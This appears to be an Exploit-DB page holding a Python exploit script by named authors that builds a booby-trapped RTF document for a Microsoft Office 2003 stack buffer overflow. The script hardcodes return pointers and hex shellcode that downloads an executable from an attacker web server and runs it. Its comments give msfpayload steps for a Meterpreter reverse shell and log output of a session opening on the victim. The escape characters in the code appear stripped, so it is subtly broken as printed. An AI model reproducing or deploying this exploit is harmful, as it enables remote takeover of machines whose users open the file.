[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft Office 2003 Home/Pro 0day
# Published : 2012-01-08
# Author :
# Previous Title : DJ Studio Pro 5.1 .pls Stack Buffer Overflow
# Next Title : Orbit Downloader URL Unicode Conversion Overflow
#!/usr/bin/python
#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on 192.168.111.132:9988 #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to 192.168.111.128 #
# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : 127.0.0.1 #
# Netmask : 255.0.0.0 #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : 192.168.111.128 #
# Netmask : 255.255.255.0 #
#-----------------------------------------------------------------------------------#
import binascii
filename = "evil.doc"
#-----------------------------------------------------------------------------------#
# File Structure #
#-----------------------------------------------------------------------------------#
file = (
"{\rt##{shp{sp}}{shp{sp}}{shp{sp}}{shp{*shpinstshpfhdr0shpbxcolumns"
"hpbyparash pwr2}{sp{sn {}{}{sn}{sn}{**}pFragments}{***}{sv{*****"
"*********************}9;2;ffffffffff")
#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
#-----------------------------------------------------------------------------------#
magic = (
"x65x62x37x37x33x31x63x39x36x34x38x62x37x31x33x30"
"x38x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65"
"x30x38x38x62x37x65x32x30x38x62x33x36x36x36x33x39"
"x34x66x31x38x37x35x66x32x63x33x36x30x38x62x36x63"
"x32x34x32x34x38x62x34x35x33x63x38x62x35x34x30x35"
"x37x38x30x31x65x61x38x62x34x61x31x38x38x62x35x61"
"x32x30x30x31x65x62x65x33x33x34x34x39x38x62x33x34"
"x38x62x30x31x65x65x33x31x66x66x33x31x63x30x66x63"
"x61x63x38x34x63x30x37x34x30x37x63x31x63x66x30x64"
"x30x31x63x37x65x62x66x34x33x62x37x63x32x34x32x38"
"x37x35x65x31x38x62x35x61x32x34x30x31x65x62x36x36"
"x38x62x30x63x34x62x38x62x35x61x31x63x30x31x65x62"
"x38x62x30x34x38x62x30x31x65x38x38x39x34x34x32x34"
"x31x63x36x31x63x33x65x38x39x32x66x66x66x66x66x66"
"x35x66x38x31x65x66x39x38x66x66x66x66x66x66x65x62"
"x30x35x65x38x65x64x66x66x66x66x66x66x36x38x38x65"
"x34x65x30x65x65x63x35x33x65x38x39x34x66x66x66x66"
"x66x66x33x31x63x39x36x36x62x39x36x66x36x65x35x31"
"x36x38x37x35x37x32x36x63x36x64x35x34x66x66x64x30"
"x36x38x33x36x31x61x32x66x37x30x35x30x65x38x37x61"
"x66x66x66x66x66x66x33x31x63x39x35x31x35x31x38x64"
"x33x37x38x31x63x36x65x65x66x66x66x66x66x66x38x64"
"x35x36x30x63x35x32x35x37x35x31x66x66x64x30x36x38"
"x39x38x66x65x38x61x30x65x35x33x65x38x35x62x66x66"
"x66x66x66x66x34x31x35x31x35x36x66x66x64x30x36x38"
"x37x65x64x38x65x32x37x33x35x33x65x38x34x62x66x66"
"x66x66x66x66x66x66x64x30x36x33x36x64x36x34x32x65"
"x36x35x37x38x36x35x32x30x32x66x36x33x32x30x32x30"
"x36x31x32x65x36x35x37x38x36x35x30x30")
#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "x36x36x34x33x33x32x33x30" #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "x35x35x32x36x34x30x33x30" #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#
EIP = "x36x36x34x33x33x32x33x30" #should ascii convert the Little Endian pointer
filler = "x30x30x30x30x38x30x37x63"*2 + "x41"*24 + "x39x30"*18
buffer = "x23"*501 + "x30x35" + "x30"*40 + EIP + filler + magic
#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#
URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)
URL2 = "00"
nxt="{}}}}}}"
nxt+="x0dx0a"
nxt+="}"
textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()